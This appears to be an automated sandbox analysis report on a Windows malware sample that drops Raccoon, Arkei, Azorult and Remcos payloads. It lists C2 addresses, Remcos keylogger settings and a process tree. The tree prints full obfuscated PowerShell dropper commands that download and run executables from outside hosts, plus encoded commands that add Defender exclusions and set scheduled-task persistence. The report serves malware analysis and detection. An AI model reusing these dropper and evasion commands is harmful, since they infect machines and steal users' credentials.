Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-08-2022 18:26

General

  • Target

    6F91871F4FB08CA2553A80A053D983D39FABF1EFC619B.exe

  • Size

    26KB

  • MD5

    268b65efa4ac17d70eacac229fe8500e

  • SHA1

    36ad089001c90b717bf0e596c086a1fa2c383159

  • SHA256

    6f91871f4fb08ca2553a80a053d983d39fabf1efc619b2e4b87972bd0d9c0d80

  • SHA512

    8c33401547b55feeb7999c4fabbc2e2514816e59ad4dea5572e5af50708fc8773937378e04e5e3c13edfb18bfbdc98782a1db1de4d40b9d5bebcb237c1da9202

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://nicoslag.ru/asdfg.exe

exe.dropper

http://nicoslag.ru/asdfg.exe

Extracted

Family

raccoon

Botnet

8a4fd4b44997ba634230ba5c422ca9f2

C2

http://193.106.191.146/

http://185.215.113.89/

rc4.plain

Extracted

Family

arkei

Botnet

Default

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Extracted

Family

remcos

Botnet

06192022

C2

nikahuve.ac.ug:6968

kalskala.ac.ug:6968

tuekisaa.ac.ug:6968

parthaha.ac.ug:6968

Attributes
  • audio_folder

    MicRecords

  • audio_path

    %AppData%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    true

  • keylog_file

    scxs.dat

  • keylog_flag

    false

  • keylog_folder

    forbas

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    cvxyttydfsgbghfgfhtd-RXTSAM

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

  • take_screenshot_title

    notepad;solitaire;

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Raccoon

    Raccoon is an infostealer written in C++ and first seen in 2019.

  • Raccoon Stealer payload 4 IoCs
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 12 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 5 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 53 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6F91871F4FB08CA2553A80A053D983D39FABF1EFC619B.exe
    "C:\Users\Admin\AppData\Local\Temp\6F91871F4FB08CA2553A80A053D983D39FABF1EFC619B.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2152
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5C4E.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\6F91871F4FB08CA2553A80A053D983D39FABF1EFC619B.exe"
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2160
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5C4E.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3608
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL imhur $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;imhur pkzwjshtlmgd $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pkzwjshtlmgd;imhur brvxmhkwft $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JpWA==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);brvxmhkwft $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1296
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5C4E.tmp\m1a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4836
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL cfgtiyleoxj $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;cfgtiyleoxj rxjawksc $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rxjawksc;cfgtiyleoxj lkhxvdgpjitz $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL25pY29zbGFnLnJ1L2FzZGZnLmV4ZQ==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);lkhxvdgpjitz $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5040
          • C:\Users\Public\rjc.exe
            "C:\Users\Public\rjc.exe"
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2588
            • C:\Users\Admin\AppData\Local\Temp\Mccegjkqnoydj.exe
              "C:\Users\Admin\AppData\Local\Temp\Mccegjkqnoydj.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3488
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                7⤵
                • Loads dropped DLL
                PID:3776
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3776 -s 1388
                  8⤵
                  • Program crash
                  PID:2260
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              6⤵
              • Loads dropped DLL
              PID:32
              • C:\Users\Admin\AppData\Local\Temp\kAp8X904.exe
                "C:\Users\Admin\AppData\Local\Temp\kAp8X904.exe"
                7⤵
                • Executes dropped EXE
                • Checks computer location settings
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                PID:4636
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                  8⤵
                    PID:1976
                • C:\Users\Admin\AppData\Local\Temp\6to831cj.exe
                  "C:\Users\Admin\AppData\Local\Temp\6to831cj.exe"
                  7⤵
                  • Executes dropped EXE
                  • Checks computer location settings
                  • Adds Run key to start application
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3472
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
                    8⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:8
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                    8⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5096
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAHIASgBiAFcATwBPAC4AZQB4AGUAIgA7ACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgA7ACAAUwB0AG8AcAAtAFAAcgBvAGMAZQBzAHMAIAAtAEkAZAAgADUAMAA5ADYAIAAtAEYAbwByAGMAZQA=
                      9⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1272
                      • C:\Users\Admin\AppData\Local\Temp\rJbWOO.exe
                        "C:\Users\Admin\AppData\Local\Temp\rJbWOO.exe"
                        10⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        • Adds Run key to start application
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4584
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
                          11⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4620
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                          11⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3300
                • C:\Users\Admin\AppData\Local\Temp\Oy3d3rF0.exe
                  "C:\Users\Admin\AppData\Local\Temp\Oy3d3rF0.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4444
                  • C:\Users\Admin\AppData\Local\Temp\Oy3d3rF0.exe
                    C:\Users\Admin\AppData\Local\Temp\Oy3d3rF0.exe
                    8⤵
                    • Executes dropped EXE
                    PID:4816
                    • C:\Windows\SysWOW64\schtasks.exe
                      /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                      9⤵
                      • Creates scheduled task(s)
                      PID:4460
                • C:\Users\Admin\AppData\Local\Temp\9r45c066.exe
                  "C:\Users\Admin\AppData\Local\Temp\9r45c066.exe"
                  7⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:176
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    8⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:1824
        • C:\Windows\SysWOW64\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:4420
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5C4E.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4000
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL cfpdmyg $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;cfpdmyg pnuqyjbf $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pnuqyjbf;cfpdmyg josedgvxy $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JqaQ==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);josedgvxy $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3300
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5C4E.tmp\b1a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2416
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL pgnfirdewovxsl $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;pgnfirdewovxsl ezosprk $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|ezosprk;pgnfirdewovxsl ctslxmfoz $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2tmZGhzYS5ydS9hc2RmZy5leGU=';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);ctslxmfoz $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3976
        • C:\Windows\SysWOW64\timeout.exe
          timeout 2
          3⤵
          • Delays execution with timeout.exe
          PID:2344
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5C4E.tmp\b2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1780
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vqaznm $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vqaznm amvlntpxjbs $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|amvlntpxjbs;vqaznm gbxlmur $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JqeA==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);gbxlmur $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4904
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5C4E.tmp\b2a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2732
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xutrghv $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xutrghv hjlgdycxt $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|hjlgdycxt;xutrghv gbljpredwuxzv $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JyYXRpb3AucnUvYXNkZmcuZXhl';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);gbljpredwuxzv $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1824
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3776 -ip 3776
      1⤵
        PID:1288
      • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1228
        • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
          C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
          2⤵
          • Executes dropped EXE
          PID:4948
          • C:\Windows\SysWOW64\schtasks.exe
            /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
            3⤵
            • Creates scheduled task(s)
            PID:4432
      • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1148
        • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
          C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
          2⤵
          • Executes dropped EXE
          PID:1220

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\mozglue.dll

        Filesize

        133KB

        MD5

        8f73c08a9660691143661bf7332c3c27

        SHA1

        37fa65dd737c50fda710fdbde89e51374d0c204a

        SHA256

        3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

        SHA512

        0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

      • C:\ProgramData\nss3.dll

        Filesize

        1.2MB

        MD5

        bfac4e3c5908856ba17d41edcd455a51

        SHA1

        8eec7e888767aa9e4cca8ff246eb2aacb9170428

        SHA256

        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

        SHA512

        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

      • C:\Users\Admin\AppData\LocalLow\mozglue.dll

        Filesize

        612KB

        MD5

        f07d9977430e762b563eaadc2b94bbfa

        SHA1

        da0a05b2b8d269fb73558dfcf0ed5c167f6d3877

        SHA256

        4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862

        SHA512

        6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf

      • C:\Users\Admin\AppData\LocalLow\nss3.dll

        Filesize

        1.9MB

        MD5

        f67d08e8c02574cbc2f1122c53bfb976

        SHA1

        6522992957e7e4d074947cad63189f308a80fcf2

        SHA256

        c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e

        SHA512

        2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5

      • C:\Users\Admin\AppData\LocalLow\sqlite3.dll

        Filesize

        1.0MB

        MD5

        dbf4f8dcefb8056dc6bae4b67ff810ce

        SHA1

        bbac1dd8a07c6069415c04b62747d794736d0689

        SHA256

        47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68

        SHA512

        b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        b340fa5865a4575ac6229e8f9158f77f

        SHA1

        478e4cae28cfa034a46b2e482566d7dcaef74947

        SHA256

        bcd4a86028ca113cbbe4d12c457ec63dcfaca4636a21fb58351b4ee71e01972c

        SHA512

        fc021d74eab1ba7528196a5aaffcc62a3212fd18a652946a68f4fd5031eb72c6d94d8ad33319b03aec95ce3b61a19ec21eb459b4e9de223a9a098c6ef8a10273

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oobeldr.exe.log

        Filesize

        1KB

        MD5

        7ebe314bf617dc3e48b995a6c352740c

        SHA1

        538f643b7b30f9231a3035c448607f767527a870

        SHA256

        48178f884b8a4dd96e330b210b0530667d9473a7629fc6b4ad12b614bf438ee8

        SHA512

